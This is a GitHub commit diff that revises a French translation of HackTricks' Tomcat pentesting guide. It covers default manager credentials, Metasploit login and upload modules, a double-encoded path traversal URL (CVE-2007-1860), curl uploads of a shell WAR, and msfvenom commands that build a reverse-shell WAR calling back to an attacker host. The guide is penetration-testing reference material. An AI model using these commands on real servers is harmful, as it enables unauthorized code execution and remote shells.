mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md
This commit is contained in:
parent
38d6eef4a3
commit
bf588aabdf
1 changed files with 12 additions and 12 deletions
|
@ -2,13 +2,13 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Travaillez-vous dans une **entreprise de cybersécurité**? Vous voulez voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||||
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Partagez vos astuces de piratage en soumettant des PRs au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Partagez vos astuces de piratage en soumettant des PR aux** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -45,9 +45,9 @@ Pour les versions de Tomcat antérieures à 6, il est possible d'énumérer les
|
|||
```bash
|
||||
msf> use auxiliary/scanner/http/tomcat_enum
|
||||
```
|
||||
### **Identifiants par défaut**
|
||||
### **Informations d'identification par défaut**
|
||||
|
||||
Le répertoire **`/manager/html`** est particulièrement sensible car il permet le téléchargement et le déploiement de fichiers WAR, ce qui peut entraîner l'exécution de code. Ce répertoire est protégé par une authentification HTTP de base, avec des identifiants courants tels que :
|
||||
Le répertoire **`/manager/html`** est particulièrement sensible car il permet le téléchargement et le déploiement de fichiers WAR, ce qui peut entraîner l'exécution de code. Ce répertoire est protégé par une authentification HTTP de base, avec des informations d'identification courantes telles que :
|
||||
|
||||
* admin:admin
|
||||
* tomcat:tomcat
|
||||
|
@ -56,7 +56,7 @@ Le répertoire **`/manager/html`** est particulièrement sensible car il permet
|
|||
* tomcat:s3cr3t
|
||||
* admin:tomcat
|
||||
|
||||
Ces identifiants peuvent être testés en utilisant :
|
||||
Ces informations d'identification peuvent être testées en utilisant :
|
||||
```bash
|
||||
msf> use auxiliary/scanner/http/tomcat_mgr_login
|
||||
```
|
||||
|
@ -74,13 +74,13 @@ En plus de définir divers paramètres dans Metasploit pour cibler un hôte spé
|
|||
|
||||
### **Divulgation de Trace de Mot de Passe**
|
||||
|
||||
L'accès à `/auth.jsp` peut révéler le mot de passe dans une trace sous des circonstances favorables.
|
||||
Accéder à `/auth.jsp` peut révéler le mot de passe dans une trace sous des circonstances favorables.
|
||||
|
||||
### **Encodage d'URL Double**
|
||||
|
||||
La vulnérabilité CVE-2007-1860 dans `mod_jk` permet un double encodage d'URL pour la traversée de chemin, permettant un accès non autorisé à l'interface de gestion via une URL spécialement conçue.
|
||||
|
||||
Pour accéder à l'interface de gestion de Tomcat, allez à : `cheminTomcat/%252E%252E/manager/html`
|
||||
Pour accéder à l'interface web de gestion de Tomcat, allez à : `cheminTomcat/%252E%252E/manager/html`
|
||||
|
||||
### /examples
|
||||
|
||||
|
@ -123,7 +123,7 @@ Enfin, si vous avez accès au Gestionnaire d'Application Web Tomcat, vous pouvez
|
|||
|
||||
### Limitations
|
||||
|
||||
Vous ne pourrez déployer un WAR que si vous avez **suffisamment de privilèges** (rôles : **admin**, **manager** et **manager-script**). Ces détails peuvent être trouvés dans _tomcat-users.xml_ généralement défini dans `/usr/share/tomcat9/etc/tomcat-users.xml` (cela varie selon les versions) (voir [POST](./#post) section).
|
||||
Vous ne pourrez déployer un WAR que si vous avez **suffisamment de privilèges** (rôles : **admin**, **manager** et **manager-script**). Ces détails peuvent être trouvés dans _tomcat-users.xml_ généralement défini dans `/usr/share/tomcat9/etc/tomcat-users.xml` (cela varie selon les versions) (voir [POST](./#post)section).
|
||||
```bash
|
||||
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
|
||||
|
||||
|
@ -134,6 +134,8 @@ curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/mana
|
|||
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
|
||||
```
|
||||
### Metasploit
|
||||
|
||||
Metasploit est un outil très puissant et polyvalent pour l'exploitation de vulnérabilités dans les systèmes informatiques. Il est largement utilisé par les professionnels de la sécurité pour tester la sécurité des réseaux et des applications. Metasploit offre une grande variété de modules d'exploitation qui peuvent être utilisés pour cibler divers services et applications, y compris Apache Tomcat.
|
||||
```bash
|
||||
use exploit/multi/http/tomcat_mgr_upload
|
||||
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
|
||||
|
@ -146,11 +148,9 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
|
|||
|
||||
1. Créez le fichier war à déployer :
|
||||
```bash
|
||||
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
|
||||
```
|
||||
### Téléchargez le fichier `revshell.war` et accédez-y (`/revshell/`):
|
||||
|
||||
### Coquille de liaison et de reverse avec [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
|
||||
### Liens et coquilles avec [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
|
||||
|
||||
Dans certains scénarios, cela ne fonctionne pas (par exemple, les anciennes versions de sun)
|
||||
|
||||
|
|
Loading…
Reference in a new issue